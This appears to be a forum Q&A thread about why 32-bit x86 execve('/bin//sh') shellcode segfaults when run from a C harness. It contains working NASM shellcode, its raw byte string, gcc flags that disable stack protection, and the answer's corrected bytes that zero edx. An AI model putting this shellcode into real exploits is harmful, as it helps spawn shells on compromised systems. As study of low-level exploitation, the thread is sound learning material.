Executing shellcode segmentation fault [closed]

Published 2019-09-02 08:48

I've compiled a basic exploit (basically, the C source doesn't exploit anything, it simply executes the opcodes which execute Bash). The problem is when I execute the binary: "Segmentation fault".

Here is what I've done:

executeBash.asm (NASM)

section .text
global _start
_start:
xor EAX, EAX           ; EAX = 0
push EAX               ; "\0\0\0\0"
push DWORD 0x68732F2F  ; "//sh"
push DWORD 0x6E69622F  ; "/bin"
mov EBX, ESP           ; arg1 = "/bin//sh\0"
push EAX     ; NULL -> args[1]
push EBX     ; "/bin//sh\0" -> args[0]
mov ECX, ESP ; arg2 = args[]
mov AL, 0X0B ; syscall 11
int 0x80     ; execve("/bin//sh", args["/bin//sh", NULL], NULL)

In the terminal:

prompt$ nasm -f elf32 executeBash.asm
prompt$ ld -m elf_i386 executeBash.o -o executeBash
prompt$ objdump -M intel,i386 -d executeBash

executeBash:     file format elf32-i386


Disassembly of section .text:

08048060 <_start>:
 8048060:   31 c0                   xor    eax,eax
 8048062:   50                      push   eax
 8048063:   68 2f 2f 73 68          push   0x68732f2f
 8048068:   68 2f 62 69 6e          push   0x6e69622f
 804806d:   89 e3                   mov    ebx,esp
 804806f:   50                      push   eax
 8048070:   53                      push   ebx
 8048071:   89 e1                   mov    ecx,esp
 8048073:   b0 0b                   mov    al,0xb
 8048075:   cd 80                   int    0x80
prompt$ # "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
prompt$ ./executeBash
$ exit
prompt$ 

The exploit in ASM runs perfectly.

exploitBash.c

int main(void)
{
    /* The opcodes from executeBash.asm, placed on the (executable) stack */
    char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
                       "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
    void (*fp)(void);
    fp = (void (*)(void))shellcode; /* treat the buffer as a function */
    fp();
    return 0;
}


prompt$ gcc -m32 -fno-stack-protector -z execstack exploitBash.c -o exploitBash
prompt$ ./exploitBash
Segmentation fault

1 answer
走好不送
Post #2 · 2019-09-02 09:19

You forgot to set up edx, so it contains whatever the C code last used it for, and that's unlikely to be a valid environment pointer. In the standalone code, edx happened to be zero due to the initial startup state of the program. If you use strace you can see that the execve returns with -EFAULT and then execution continues past your code into garbage which then truly segfaults. You can fix the shellcode for example like this:

char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
               "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\x31\xd2\xcd\x80";

(I included a xor edx, edx before the int 0x80.)
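The diagnosis above, reproduced in plain C as an added example (not code from the question or the answer): the same execve call the shellcode makes, once with a constructed garbage envp standing in for the leftover edx, and once with the NULL that xor edx, edx produces. Each call runs in a forked child so the parent survives and can report the kernel's answer; the unmapped address, the exit code 3 and the function name are assumptions of this example.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <stddef.h>
#include <stdio.h>
#include <sys/wait.h>
#include <unistd.h>

/* Constructed stand-in for a garbage edx: a low address that is never mapped
 * in a normal process (below vm.mmap_min_addr), so the kernel faults reading it. */
#define GARBAGE_ENVP ((char *const *)0x10)

/* Exit status the child shell reports when the execve actually succeeds. */
#define SHELL_EXIT_CODE 3

/* Runs execve("/bin/sh", ["sh","-c","exit 3"], envp) in a child process.
 * Returns SHELL_EXIT_CODE if the exec went through, the child's errno
 * (EFAULT for an unreadable envp) if execve failed, or -1 on fork/wait error. */
int execve_with_envp(char *const envp[])
{
    char *const argv[] = { "sh", "-c", "exit 3", NULL };
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve("/bin/sh", argv, envp);
        _exit(errno);          /* only reached when execve fails */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    int bad = execve_with_envp(GARBAGE_ENVP); /* what a leftover edx looks like */
    int ok  = execve_with_envp(NULL);         /* what xor edx,edx gives */
    printf("garbage envp: execve failed, errno=%d (%s)\n", bad,
           bad == EFAULT ? "EFAULT, the same value strace shows" : "other");
    printf("NULL envp: shell ran and exited with %d\n", ok);
    return 0;
}
```

Linux treats a NULL envp as an empty environment, which is why zeroing edx is enough; the shellcode has no way to recover from the -EFAULT return, so it falls through into whatever bytes follow the buffer.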
